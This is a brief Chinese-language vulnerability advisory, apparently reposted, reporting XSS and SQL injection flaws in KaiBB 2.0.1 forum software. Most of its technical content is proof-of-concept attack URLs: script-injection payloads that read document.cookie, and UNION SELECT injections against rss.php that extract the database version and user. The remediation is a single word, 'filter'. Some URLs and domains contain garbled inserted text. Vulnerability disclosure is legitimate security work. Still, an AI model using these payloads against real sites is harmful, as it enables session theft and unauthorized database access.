标题: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities
作者: Stefan Schurtz
影响软件:Successfully tested on KaiBB 2.0.1
开发者:http://code.google测试数据/p/kaibb/
缺陷分析:
概述:
KaiBB 2.0.1 含XSS 和SQL Injection
技术分析 :
Cross-site Scripting
http://HdhCmsTest2cto测试数据 /kaibb/?'</script><script>alert(document.cookie)</script>
http://HdhCmsTest2cto测试数据 /kaibb/index.php?'</script><script>alert(document.cookie)</script>
SQL Injection
http://HdhCmsTest2cto测试数据 /kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://HdhCmsTest2cto测试数据 /kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://HdhCmsTest2cto测试数据 /kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
解决:
过滤
查看更多关于KaiBB 2.0.1 SQL注射缺陷及修复 - 网站安全 - 自学p的详细内容...